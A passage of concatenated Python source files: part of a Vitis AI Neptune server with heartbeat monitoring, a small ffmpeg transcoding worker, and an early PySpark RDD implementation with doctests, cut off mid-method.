self.ws_server = self.ws_app.listen(options.wsport)
self.xspub = xstream.Publisher()
self.xs2server = threading.Thread(target=ServerApp.xstream2server)
self.xs2server.start()
self.heartbeat_thread = threading.Thread(target=ServerApp.heartbeat, args=(lambda: self.do_exit,))
self.heartbeat_thread.start()
@staticmethod
def get_recipes():
"""
Get all recipes from the recipes folder. If recipe_*.bak files exist,
use those to construct services. Otherwise, construct from source using
the default recipe functions.
"""
recipes = []
recipes_cache = os.environ["VAI_ALVEO_ROOT"] + "/../demo/neptune/recipes/"
file_names = [fn for fn in os.listdir(recipes_cache)
if fn.startswith('recipe_') and fn.endswith('.bak')]
if file_names:
logger.info("Constructing services from cache")
for file_name in file_names:
with open(recipes_cache + file_name) as f:
recipes.append(json.load(f, object_hook=hinted_tuple_hook))
else:
logger.info("Constructing services from source")
modules = list_submodules('neptune.recipes')
for module_path in modules:
module = importlib.import_module(module_path)
attrs = dir(module)
for attr in attrs:
if attr.startswith('recipe_'):
recipe = getattr(module, attr)
if callable(recipe):
recipes.append(recipe().to_dict())
return recipes
@staticmethod
def xstream2server():
xs = xstream.Subscribe("__server__")
while True:
# subscribe to special "__server__" channel for
# other processes to send messages to this server
# e.g. speedodata -> websockets
msg_str = xs.get_msg()
if msg_str is None:
break
try:
msg = json.loads(msg_str)
if msg['topic'] == 'speedodata':
WebSocketHandler.broadcast(msg['topic'], msg['message'])
elif msg['topic'] == 'callback' and 'callback_id' in msg:
# print("sending callback message")
# print(msg['message'])
WebSocketHandler.send_to_client(\
msg['callback_id'], msg['topic'], msg['message'])
elif msg['topic'] == 'xs_throughput':
report = json.loads(msg['message'])
#print(report)
for name, throughput in report.items():
serviceName = name.split('.')[0]
edgeName = name[name.find('.')+1:]
ServiceManager().update_throughput_stats(serviceName,
edgeName, throughput)
except:
pass
cancel_async_tasks()
@staticmethod
def heartbeat(stop):
xs = xstream.Subscribe("__heartbeat__", timeout=5000)
service_manager = ServiceManager()
node_status = {}
def check_services(node_status):
if stop:
return
invalid_services = []
for service, status in node_status.items():
last_valid = status['last_valid']
service_state = service_manager._services[service]['state']
is_starting = service_state == service_manager.STARTING
is_started = service_state == service_manager.STARTED
# if the service has been stopped, clear it
if service_state == service_manager.STOPPED:
invalid_services.append(service)
# if there's a discrepancy in what the service_manager says
# and what we have cached, clear it
elif is_starting and node_status[service]['is_started']:
invalid_services.append(service)
# if it's started and hasn't been valid in the last n secs,
# restart it
elif is_started and now - last_valid > 5:
logger.warning("Service %s is dead, restarting" % service)
service_manager.stop(service)
service_manager.start(service)
node_status[service]['is_started'] = False
for service in invalid_services:
del node_status[service]
logger = logging.getLogger(__name__)
while True:
if stop():
break
# when enabling coverage, this line will raise an exception for some
# reason. For now, just catching it
try:
msg_str = xs.get_msg()
now = time.time()
except Exception:
logger.exception("Shouldn't happen")
# the get_msg timed out, i.e. no heartbeats received
if msg_str == (None, None):
check_services(node_status)
continue
msg = json.loads(msg_str)
service = msg['service']
channel = msg['channel']
# if this is the first time we've seen this service
if service not in node_status:
_first_edge, last_edge = service_manager._get_graph_io(service)
node_status[service] = {
'last_valid': 0, # saves the last time this service was valid
'is_started': False, # our check that services haven't stopped
'last_edge': last_edge[0], # saves the last edge of the service
'channels': {} # save heartbeat times for each channel
}
node_status[service]['channels'][channel] = now
service_state = service_manager._services[service]['state']
if node_status[service]['last_edge'] == channel:
if service_state == service_manager.STARTING:
if not node_status[service]['is_started']:
service_manager._services[service]['state'] = service_manager.STARTED
node_status[service]['is_started'] = True
else:
# there's a discrepancy. For example, the service may
# have been stopped and something else started with
# the same name. In this case, clear the cache
del node_status[service]
continue
node_status[service]['last_valid'] = now
check_services(node_status)
cancel_async_tasks()
def launch(self):
    # Run the server: poll check_exit every 500 ms for a shutdown request,
    # then enter the Tornado IOLoop. start() blocks until the loop is
    # stopped elsewhere; close() releases its resources afterwards.
    tornado.ioloop.PeriodicCallback(self.check_exit, 500).start()
    loop = tornado.ioloop.IOLoop.instance()
    loop.start()
    loop.close()
def signal_handler(self, signum, frame):
    # Termination-signal hook: stop every managed service, then set the
    # flag that the periodic check_exit callback watches to tear down.
    logger.status("Shutting down server...")
    ServiceManager().stop_all()
    self.do_exit = True
# def sigquit_handler(self, signum, frame):
# print("restarting server...")
# ServiceManager().stop_all()
# self.do_restart = True
def check_exit(self):
    """Periodic (500 ms) housekeeping callback.

    Three mutually exclusive paths:
      * ``do_exit`` set      -> tear down all server components;
      * heartbeat counter due -> broadcast a heartbeat to started services;
      * otherwise             -> just advance the heartbeat counter.
    """
    if self.do_exit:
        # Shutdown requested (see signal_handler): unwind publishers,
        # worker threads and both servers, then drop the xstream handle.
        self.xspub.end("__server__")
        self.xs2server.join()
        self.heartbeat_thread.join()
        self.ws_server.stop()
        self.web_server.stop()
        cancel_async_tasks()
        del self.xserver
    elif self.hbeat > 4:
        # Every 5th tick (~2.5 s): ping every service that is at least
        # STARTING so the monitor loop can detect dead ones.
        self.hbeat = 0
        service_manager = ServiceManager()
        running = [
            name
            for name, svc in service_manager.list().items()
            if svc['state'] >= service_manager.STARTING
        ]
        for service in running:
            payload = json.dumps({
                '__heartbeat__': service,
                'id': 'hbeat_' + str(self.hbeat_id)
            })
            service_manager.send(service, 0, np.zeros(1), payload)
        self.hbeat_id = (self.hbeat_id + 1) % 9999
    else:
        self.hbeat += 1
# A do_restart path (tear everything down and re-exec main) used to live
# here; the restarted server came up unresponsive, so it is disabled
# until that is debugged.
def main():
    """Entry point: append a session separator to today's Neptune log,
    apply the Tornado/asyncio any-thread workaround on Python 3, and
    launch the server app (blocks inside the IOLoop).

    Raises:
        KeyError: if the VAI_ALVEO_ROOT environment variable is unset.
        IOError/OSError: if the log directory does not exist.
    """
    # Build the path with os.path.join instead of fragile '+' string
    # concatenation (the original hard-coded '/' separators).
    logging_directory = os.path.join(
        os.environ['VAI_ALVEO_ROOT'], '..', 'demo', 'neptune', 'logs')
    log_name = '_{:%Y-%m-%d}.log'.format(datetime.now())
    log_path = os.path.join(logging_directory, 'neptune' + log_name)
    # One separator line per server start makes session boundaries visible
    # in the shared daily log file.
    with open(log_path, 'a') as f:
        f.write("################################################################\n")
    # https://github.com/tornadoweb/tornado/issues/2531
    if six.PY3:
        asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
    app = ServerApp()
    app.launch()


if __name__ == "__main__":
    main()
|
selfNode.py | import logging
import socket
import subprocess
import threading
import time
from python.cloudServer import Processor
def memoryToffmpeg(In, Out):
    """Feed the in-memory payload *In* into the writable pipe *Out*.

    Flushes and closes the pipe so the consumer (ffmpeg) sees EOF. Any
    failure — typically a broken pipe when ffmpeg dies early — is logged
    and swallowed so the feeding thread never raises.
    """
    try:
        Out.write(In)
        Out.flush()
        Out.close()
    except Exception as exc:
        logging.exception(exc)
class SelfNode:
    """In-process worker node: pulls pending work from its Processor and
    pipes it through an ffmpeg subprocess (mpegts in -> h264/aac mpegts out).
    """

    def __init__(self):
        self.processor = Processor()

    def attachToServer(self, server):
        """Register this node's processor with *server*."""
        server.registerProcessor(self.processor)

    def start(self):
        """Run the transcode loop on a background thread.

        The thread is a daemon: selfNode() never returns, and a non-daemon
        thread would keep the interpreter alive forever at shutdown
        (the original thread was non-daemon — a hang-on-exit bug).
        """
        t = threading.Thread(target=self.selfNode)
        t.daemon = True
        t.start()

    def selfNode(self):
        """Poll the processor for work and transcode it; never returns."""
        while True:
            p = None
            try:
                if not self.processor.isCanStartWork():
                    time.sleep(0.1)
                    continue
                p = subprocess.Popen(
                    ['ffmpeg', '-f', 'mpegts', '-i', '-',
                     '-c:v', 'libx264', '-c:a', 'aac', '-preset', 'veryfast',
                     '-f', 'mpegts', '-'],
                    stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                    stderr=subprocess.DEVNULL)
                # Feed stdin from a helper thread while draining stdout here;
                # doing both on one thread could deadlock on pipe buffers.
                copy = threading.Thread(target=memoryToffmpeg,
                                        args=(self.processor.workData, p.stdin))
                copy.start()
                converted = p.stdout.read()
                p.stdout.close()
                p.wait()
                self.processor.markAsFinished(converted)
            except Exception as e:
                logging.exception(e)
                # Best-effort cleanup. `except Exception` (not the original
                # bare `except:`) so KeyboardInterrupt/SystemExit propagate,
                # and the kill is only attempted when Popen succeeded.
                if p is not None:
                    try:
                        p.kill()
                    except Exception:
                        pass
|
rdd.py | from base64 import standard_b64encode as b64enc
import copy
from collections import defaultdict
from itertools import chain, ifilter, imap, product
import operator
import os
import shlex
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from pyspark import cloudpickle
from pyspark.serializers import batched, Batch, dump_pickle, load_pickle, \
read_from_pickle_file
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_cogroup
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
class RDD(object):
    """
    A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
    Represents an immutable, partitioned collection of elements that can be
    operated on in parallel.

    NOTE(review): Python 2-era code (``imap``/``ifilter`` from itertools,
    ``dict.iteritems`` and tuple-parameter lambdas); it will not run
    unmodified on Python 3.
    """

    def __init__(self, jrdd, ctx):
        # jrdd is the Py4J proxy for the underlying JavaRDD; ctx is the
        # owning SparkContext.
        self._jrdd = jrdd
        self.is_cached = False
        self.is_checkpointed = False
        self.ctx = ctx
        # Set by partitionBy() so id(partitionFunc) stays alive/unique.
        self._partitionFunc = None

    @property
    def context(self):
        """
        The L{SparkContext} that this RDD was created on.
        """
        return self.ctx

    def cache(self):
        """
        Persist this RDD with the default storage level (C{MEMORY_ONLY}).
        """
        self.is_cached = True
        self._jrdd.cache()
        return self

    def checkpoint(self):
        """
        Mark this RDD for checkpointing. It will be saved to a file inside the
        checkpoint directory set with L{SparkContext.setCheckpointDir()} and
        all references to its parent RDDs will be removed. This function must
        be called before any job has been executed on this RDD. It is strongly
        recommended that this RDD is persisted in memory, otherwise saving it
        on a file will require recomputation.
        """
        self.is_checkpointed = True
        self._jrdd.rdd().checkpoint()

    def isCheckpointed(self):
        """
        Return whether this RDD has been checkpointed or not
        """
        return self._jrdd.rdd().isCheckpointed()

    def getCheckpointFile(self):
        """
        Gets the name of the file to which this RDD was checkpointed
        """
        # getCheckpointFile() returns a Scala Option; unwrap to path or None.
        checkpointFile = self._jrdd.rdd().getCheckpointFile()
        if checkpointFile.isDefined():
            return checkpointFile.get()
        else:
            return None

    # TODO persist(self, storageLevel)

    def map(self, f, preservesPartitioning=False):
        """
        Return a new RDD by applying a function to each element of this RDD.
        """
        # (Docstring fixed: it previously duplicated distinct()'s text.)
        def func(split, iterator): return imap(f, iterator)
        return PipelinedRDD(self, func, preservesPartitioning)

    def flatMap(self, f, preservesPartitioning=False):
        """
        Return a new RDD by first applying a function to all elements of this
        RDD, and then flattening the results.
        >>> rdd = sc.parallelize([2, 3, 4])
        >>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
        [1, 1, 1, 2, 2, 3]
        >>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
        [(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
        """
        def func(s, iterator): return chain.from_iterable(imap(f, iterator))
        return self.mapPartitionsWithSplit(func, preservesPartitioning)

    def mapPartitions(self, f, preservesPartitioning=False):
        """
        Return a new RDD by applying a function to each partition of this RDD.
        >>> rdd = sc.parallelize([1, 2, 3, 4], 2)
        >>> def f(iterator): yield sum(iterator)
        >>> rdd.mapPartitions(f).collect()
        [3, 7]
        """
        def func(s, iterator): return f(iterator)
        # NOTE(review): preservesPartitioning is accepted but not forwarded
        # to mapPartitionsWithSplit — looks unintentional; confirm.
        return self.mapPartitionsWithSplit(func)

    def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
        """
        Return a new RDD by applying a function to each partition of this RDD,
        while tracking the index of the original partition.
        >>> rdd = sc.parallelize([1, 2, 3, 4], 4)
        >>> def f(splitIndex, iterator): yield splitIndex
        >>> rdd.mapPartitionsWithSplit(f).sum()
        6
        """
        return PipelinedRDD(self, f, preservesPartitioning)

    def filter(self, f):
        """
        Return a new RDD containing only the elements that satisfy a predicate.
        >>> rdd = sc.parallelize([1, 2, 3, 4, 5])
        >>> rdd.filter(lambda x: x % 2 == 0).collect()
        [2, 4]
        """
        def func(iterator): return ifilter(f, iterator)
        return self.mapPartitions(func)

    def distinct(self):
        """
        Return a new RDD containing the distinct elements in this RDD.
        >>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
        [1, 2, 3]
        """
        # Implemented as a dummy-value reduceByKey so dedup happens via the
        # shuffle machinery (works for unhashable-free keyed data).
        return self.map(lambda x: (x, "")) \
                   .reduceByKey(lambda x, _: x) \
                   .map(lambda (x, _): x)

    # TODO: sampling needs to be re-implemented due to Batch
    #def sample(self, withReplacement, fraction, seed):
    #    jrdd = self._jrdd.sample(withReplacement, fraction, seed)
    #    return RDD(jrdd, self.ctx)
    #def takeSample(self, withReplacement, num, seed):
    #    vals = self._jrdd.takeSample(withReplacement, num, seed)
    #    return [load_pickle(bytes(x)) for x in vals]

    def union(self, other):
        """
        Return the union of this RDD and another one.
        >>> rdd = sc.parallelize([1, 1, 2, 3])
        >>> rdd.union(rdd).collect()
        [1, 1, 2, 3, 1, 1, 2, 3]
        """
        return RDD(self._jrdd.union(other._jrdd), self.ctx)

    def __add__(self, other):
        """
        Return the union of this RDD and another one.
        >>> rdd = sc.parallelize([1, 1, 2, 3])
        >>> (rdd + rdd).collect()
        [1, 1, 2, 3, 1, 1, 2, 3]
        """
        if not isinstance(other, RDD):
            # NOTE(review): raised without a message; callers only see the type.
            raise TypeError
        return self.union(other)

    # TODO: sort

    def glom(self):
        """
        Return an RDD created by coalescing all elements within each partition
        into a list.
        >>> rdd = sc.parallelize([1, 2, 3, 4], 2)
        >>> sorted(rdd.glom().collect())
        [[1, 2], [3, 4]]
        """
        def func(iterator): yield list(iterator)
        return self.mapPartitions(func)

    def cartesian(self, other):
        """
        Return the Cartesian product of this RDD and another one, that is, the
        RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
        C{b} is in C{other}.
        >>> rdd = sc.parallelize([1, 2])
        >>> sorted(rdd.cartesian(rdd).collect())
        [(1, 1), (1, 2), (2, 1), (2, 2)]
        """
        # Due to batching, we can't use the Java cartesian method.
        java_cartesian = RDD(self._jrdd.cartesian(other._jrdd), self.ctx)
        def unpack_batches(pair):
            # Each side may be a serializer Batch or a bare element; expand
            # batches so the output pairs contain plain elements.
            (x, y) = pair
            if type(x) == Batch or type(y) == Batch:
                xs = x.items if type(x) == Batch else [x]
                ys = y.items if type(y) == Batch else [y]
                for pair in product(xs, ys):
                    yield pair
            else:
                yield pair
        return java_cartesian.flatMap(unpack_batches)

    def groupBy(self, f, numSplits=None):
        """
        Return an RDD of grouped items.
        >>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
        >>> result = rdd.groupBy(lambda x: x % 2).collect()
        >>> sorted([(x, sorted(y)) for (x, y) in result])
        [(0, [2, 8]), (1, [1, 1, 3, 5])]
        """
        return self.map(lambda x: (f(x), x)).groupByKey(numSplits)

    def pipe(self, command, env={}):
        """
        Return an RDD created by piping elements to a forked external process.
        >>> sc.parallelize([1, 2, 3]).pipe('cat').collect()
        ['1', '2', '3']
        """
        # NOTE(review): mutable default argument (env={}) — shared across
        # calls if ever mutated; also the child inherits ONLY this env.
        def func(iterator):
            pipe = Popen(shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
            def pipe_objs(out):
                # Feed stdin on a helper thread while the generator below
                # drains stdout, avoiding a pipe-buffer deadlock.
                for obj in iterator:
                    out.write(str(obj).rstrip('\n') + '\n')
                out.close()
            Thread(target=pipe_objs, args=[pipe.stdin]).start()
            return (x.rstrip('\n') for x in pipe.stdout)
        return self.mapPartitions(func)

    def foreach(self, f):
        """
        Applies a function to all elements of this RDD.
        >>> def f(x): print x
        >>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
        """
        self.map(f).collect()  # Force evaluation

    def collect(self):
        """
        Return a list that contains all of the elements in this RDD.
        """
        picklesInJava = self._jrdd.collect().iterator()
        return list(self._collect_iterator_through_file(picklesInJava))

    def _collect_iterator_through_file(self, iterator):
        # Transferring lots of data through Py4J can be slow because
        # socket.readline() is inefficient. Instead, we'll dump the data to a
        # file and read it back.
        tempFile = NamedTemporaryFile(delete=False, dir=self.ctx._temp_dir)
        tempFile.close()
        self.ctx._writeIteratorToPickleFile(iterator, tempFile.name)
        # Read the data into Python and deserialize it:
        with open(tempFile.name, 'rb') as tempFile:
            for item in read_from_pickle_file(tempFile):
                yield item
        os.unlink(tempFile.name)

    def reduce(self, f):
        """
        Reduces the elements of this RDD using the specified commutative and
        associative binary operator.
        >>> from operator import add
        >>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
        15
        >>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
        10
        """
        def func(iterator):
            # Per-partition reduce; yields nothing for an empty partition so
            # empty partitions do not contribute to the final reduce.
            acc = None
            for obj in iterator:
                if acc is None:
                    acc = obj
                else:
                    acc = f(obj, acc)
            if acc is not None:
                yield acc
        vals = self.mapPartitions(func).collect()
        # Python 2 builtin reduce() combines the per-partition results.
        return reduce(f, vals)

    def fold(self, zeroValue, op):
        """
        Aggregate the elements of each partition, and then the results for all
        the partitions, using a given associative function and a neutral "zero
        value."
        The function C{op(t1, t2)} is allowed to modify C{t1} and return it
        as its result value to avoid object allocation; however, it should not
        modify C{t2}.
        >>> from operator import add
        >>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
        15
        """
        def func(iterator):
            acc = zeroValue
            for obj in iterator:
                acc = op(obj, acc)
            yield acc
        vals = self.mapPartitions(func).collect()
        return reduce(op, vals, zeroValue)

    # TODO: aggregate

    def sum(self):
        """
        Add up the elements in this RDD.
        >>> sc.parallelize([1.0, 2.0, 3.0]).sum()
        6.0
        """
        return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)

    def count(self):
        """
        Return the number of elements in this RDD.
        >>> sc.parallelize([2, 3, 4]).count()
        3
        """
        return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()

    def countByValue(self):
        """
        Return the count of each unique value in this RDD as a dictionary of
        (value, count) pairs.
        >>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
        [(1, 2), (2, 3)]
        """
        def countPartition(iterator):
            counts = defaultdict(int)
            for obj in iterator:
                counts[obj] += 1
            yield counts
        def mergeMaps(m1, m2):
            for (k, v) in m2.iteritems():
                m1[k] += v
            return m1
        return self.mapPartitions(countPartition).reduce(mergeMaps)

    def take(self, num):
        """
        Take the first num elements of the RDD.
        This currently scans the partitions *one by one*, so it will be slow if
        a lot of partitions are required. In that case, use L{collect} to get
        the whole RDD instead.
        >>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
        [2, 3]
        >>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
        [2, 3, 4, 5, 6]
        """
        items = []
        for partition in range(self._jrdd.splits().size()):
            iterator = self.ctx._takePartition(self._jrdd.rdd(), partition)
            # Each item in the iterator is a string, Python object, batch of
            # Python objects. Regardless, it is sufficient to take `num`
            # of these objects in order to collect `num` Python objects:
            iterator = iterator.take(num)
            items.extend(self._collect_iterator_through_file(iterator))
            if len(items) >= num:
                break
        return items[:num]

    def first(self):
        """
        Return the first element in this RDD.
        >>> sc.parallelize([2, 3, 4]).first()
        2
        """
        return self.take(1)[0]

    def saveAsTextFile(self, path):
        """
        Save this RDD as a text file, using string representations of elements.
        >>> tempFile = NamedTemporaryFile(delete=True)
        >>> tempFile.close()
        >>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
        >>> from fileinput import input
        >>> from glob import glob
        >>> ''.join(input(glob(tempFile.name + "/part-0000*")))
        '0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
        """
        def func(split, iterator):
            return (str(x).encode("utf-8") for x in iterator)
        keyed = PipelinedRDD(self, func)
        # Bypass the pickle serializer: elements are already UTF-8 bytes.
        keyed._bypass_serializer = True
        keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)

    # Pair functions

    def collectAsMap(self):
        """
        Return the key-value pairs in this RDD to the master as a dictionary.
        >>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
        >>> m[1]
        2
        >>> m[3]
        4
        """
        return dict(self.collect())

    def reduceByKey(self, func, numSplits=None):
        """
        Merge the values for each key using an associative reduce function.
        This will also perform the merging locally on each mapper before
        sending results to a reducer, similarly to a "combiner" in MapReduce.
        Output will be hash-partitioned with C{numSplits} splits, or the
        default parallelism level if C{numSplits} is not specified.
        >>> from operator import add
        >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
        >>> sorted(rdd.reduceByKey(add).collect())
        [('a', 2), ('b', 1)]
        """
        return self.combineByKey(lambda x: x, func, func, numSplits)

    def reduceByKeyLocally(self, func):
        """
        Merge the values for each key using an associative reduce function, but
        return the results immediately to the master as a dictionary.
        This will also perform the merging locally on each mapper before
        sending results to a reducer, similarly to a "combiner" in MapReduce.
        >>> from operator import add
        >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
        >>> sorted(rdd.reduceByKeyLocally(add).items())
        [('a', 2), ('b', 1)]
        """
        def reducePartition(iterator):
            m = {}
            for (k, v) in iterator:
                m[k] = v if k not in m else func(m[k], v)
            yield m
        def mergeMaps(m1, m2):
            for (k, v) in m2.iteritems():
                m1[k] = v if k not in m1 else func(m1[k], v)
            return m1
        return self.mapPartitions(reducePartition).reduce(mergeMaps)

    def countByKey(self):
        """
        Count the number of elements for each key, and return the result to the
        master as a dictionary.
        >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
        >>> sorted(rdd.countByKey().items())
        [('a', 2), ('b', 1)]
        """
        return self.map(lambda x: x[0]).countByValue()

    def join(self, other, numSplits=None):
        """
        Return an RDD containing all pairs of elements with matching keys in
        C{self} and C{other}.
        Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
        (k, v1) is in C{self} and (k, v2) is in C{other}.
        Performs a hash join across the cluster.
        >>> x = sc.parallelize([("a", 1), ("b", 4)])
        >>> y = sc.parallelize([("a", 2), ("a", 3)])
        >>> sorted(x.join(y).collect())
        [('a', (1, 2)), ('a', (1, 3))]
        """
        return python_join(self, other, numSplits)

    def leftOuterJoin(self, other, numSplits=None):
        """
        Perform a left outer join of C{self} and C{other}.
        For each element (k, v) in C{self}, the resulting RDD will either
        contain all pairs (k, (v, w)) for w in C{other}, or the pair
        (k, (v, None)) if no elements in other have key k.
        Hash-partitions the resulting RDD into the given number of partitions.
        >>> x = sc.parallelize([("a", 1), ("b", 4)])
        >>> y = sc.parallelize([("a", 2)])
        >>> sorted(x.leftOuterJoin(y).collect())
        [('a', (1, 2)), ('b', (4, None))]
        """
        return python_left_outer_join(self, other, numSplits)

    def rightOuterJoin(self, other, numSplits=None):
        """
        Perform a right outer join of C{self} and C{other}.
        For each element (k, w) in C{other}, the resulting RDD will either
        contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
        if no elements in C{self} have key k.
        Hash-partitions the resulting RDD into the given number of partitions.
        >>> x = sc.parallelize([("a", 1), ("b", 4)])
        >>> y = sc.parallelize([("a", 2)])
        >>> sorted(y.rightOuterJoin(x).collect())
        [('a', (2, 1)), ('b', (None, 4))]
        """
        return python_right_outer_join(self, other, numSplits)

    # TODO: add option to control map-side combining
    def partitionBy(self, numSplits, partitionFunc=hash):
        """
        Return a copy of the RDD partitioned using the specified partitioner.
        >>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
        >>> sets = pairs.partitionBy(2).glom().collect()
        >>> set(sets[0]).intersection(set(sets[1]))
        set([])
        """
        if numSplits is None:
            numSplits = self.ctx.defaultParallelism
        # Transferring O(n) objects to Java is too expensive. Instead, we'll
        # form the hash buckets in Python, transferring O(numSplits) objects
        # to Java. Each object is a (splitNumber, [objects]) pair.
        def add_shuffle_key(split, iterator):
            buckets = defaultdict(list)
            for (k, v) in iterator:
                buckets[partitionFunc(k) % numSplits].append((k, v))
            for (split, items) in buckets.iteritems():
                yield str(split)
                yield dump_pickle(Batch(items))
        keyed = PipelinedRDD(self, add_shuffle_key)
        keyed._bypass_serializer = True
        pairRDD = self.ctx._jvm.PairwiseRDD(keyed._jrdd.rdd()).asJavaPairRDD()
        partitioner = self.ctx._jvm.PythonPartitioner(numSplits,
                                                      id(partitionFunc))
        jrdd = pairRDD.partitionBy(partitioner).values()
        rdd = RDD(jrdd, self.ctx)
        # This is required so that id(partitionFunc) remains unique, even if
        # partitionFunc is a lambda:
        rdd._partitionFunc = partitionFunc
        return rdd

    # TODO: add control over map-side aggregation
    def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
                     numSplits=None):
        """
        Generic function to combine the elements for each key using a custom
        set of aggregation functions.
        Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
        type" C. Note that V and C can be different -- for example, one might
        group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
        Users provide three functions:
        - C{createCombiner}, which turns a V into a C (e.g., creates
        a one-element list)
        - C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
        a list)
        - C{mergeCombiners}, to combine two C's into a single one.
        In addition, users can control the partitioning of the output RDD.
        >>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
        >>> def f(x): return x
        >>> def add(a, b): return a + str(b)
        >>> sorted(x.combineByKey(str, add, add).collect())
        [('a', '11'), ('b', '1')]
        """
        if numSplits is None:
            numSplits = self.ctx.defaultParallelism
        def combineLocally(iterator):
            # Map-side ("combiner") aggregation before the shuffle.
            combiners = {}
            for (k, v) in iterator:
                if k not in combiners:
                    combiners[k] = createCombiner(v)
                else:
                    combiners[k] = mergeValue(combiners[k], v)
            return combiners.iteritems()
        locally_combined = self.mapPartitions(combineLocally)
        shuffled = locally_combined.partitionBy(numSplits)
        def _mergeCombiners(iterator):
            # Reduce-side merge of the shuffled per-partition combiners.
            combiners = {}
            for (k, v) in iterator:
                if not k in combiners:
                    combiners[k] = v
                else:
                    combiners[k] = mergeCombiners(combiners[k], v)
            return combiners.iteritems()
        return shuffled.mapPartitions(_mergeCombiners)

    # TODO: support variant with custom partitioner
    def groupByKey(self, numSplits=None):
        """
        Group the values for each key in the RDD into a single sequence.
        Hash-partitions the resulting RDD with into numSplits partitions.
        >>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
        >>> sorted(x.groupByKey().collect())
        [('a', [1, 1]), ('b', [1])]
        """
        def createCombiner(x):
            return [x]
        def mergeValue(xs, x):
            xs.append(x)
            return xs
        def mergeCombiners(a, b):
            return a + b
        return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
                                 numSplits)

    # TODO: add tests
    def flatMapValues(self, f):
        """
        Pass each value in the key-value pair RDD through a flatMap function
        without changing the keys; this also retains the original RDD's
        partitioning.
        """
        flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
        return self.flatMap(flat_map_fn, preservesPartitioning=True)

    def mapValues(self, f):
        """
        Pass each value in the key-value pair RDD through a map function
        without changing the keys; this also retains the original RDD's
        partitioning.
        """
        map_values_fn = lambda (k, v): (k, f(v))
        return self.map(map_values_fn, preservesPartitioning=True)

    # TODO: support varargs cogroup of several RDDs.
    def groupWith(self, other):
        """
        Alias for cogroup.
        """
        return self.cogroup(other)

    # TODO: add variant with custom parittioner
    def cogroup(self, other, numSplits=None):
        """
        For each key k in C{self} or C{other}, return a resulting RDD that
        contains a tuple with the list of values for that key in C{self} as well
        as C{other}.
        >>> x = sc.parallelize([("a", 1), ("b", 4)])
        >>> y = sc.parallelize([("a", 2)])
        >>> sorted(x.cogroup(y).collect())
        [('a', ([1], [2])), ('b', ([4], []))]
        """
        return python_cogroup(self, other, numSplits)

    # TODO: `lookup` is disabled because we can't make direct comparisons based
    # on the key; we need to compare the hash of the key to the hash of the
    # keys in the pairs. This could be an expensive operation, since those
    # hashes aren't retained.
class PipelinedRDD(RDD):
    """
    Pipelined maps:
    >>> rdd = sc.parallelize([1, 2, 3, 4])
    >>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
    [4, 8, 12, 16]
    >>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
    [4, 8, 12, 16]
    Pipelined reduces:
    >>> from operator import add
    >>> rdd.map(lambda x: 2 * x).reduce(add)
    20
    >>> rdd.flatMap(lambda x: [x, x]).reduce(add)
    20
    """

    def __init__(self, prev, func, preservesPartitioning=False):
        # If the parent is itself a fusable PipelinedRDD, compose the two
        # per-partition functions so both stages run in a single
        # Java->Python pipe, skipping the parent's serialization round-trip.
        if isinstance(prev, PipelinedRDD) and prev._is_pipelinable():
            prev_func = prev.func
            def pipeline_func(split, iterator):
                return func(split, prev_func(split, iterator))
            self.func = pipeline_func
            # Only preserved if every fused stage preserves partitioning.
            self.preservesPartitioning = \
                prev.preservesPartitioning and preservesPartitioning
            self._prev_jrdd = prev._prev_jrdd
        else:
            self.func = func
            self.preservesPartitioning = preservesPartitioning
            self._prev_jrdd = prev._jrdd
        self.is_cached = False
        self.is_checkpointed = False
        self.ctx = prev.ctx
        self.prev = prev
        # _jrdd_val caches the lazily-built JavaRDD (see _jrdd below).
        self._jrdd_val = None
        self._bypass_serializer = False

    @property
    def _jrdd(self):
        # Lazily construct (and memoize) the JavaRDD for this pipeline stage.
        if self._jrdd_val:
            return self._jrdd_val
        func = self.func
        if not self._bypass_serializer and self.ctx.batchSize != 1:
            # Re-batch the stage's output so the pickle serializer ships
            # elements in groups of ctx.batchSize.
            oldfunc = self.func
            batchSize = self.ctx.batchSize
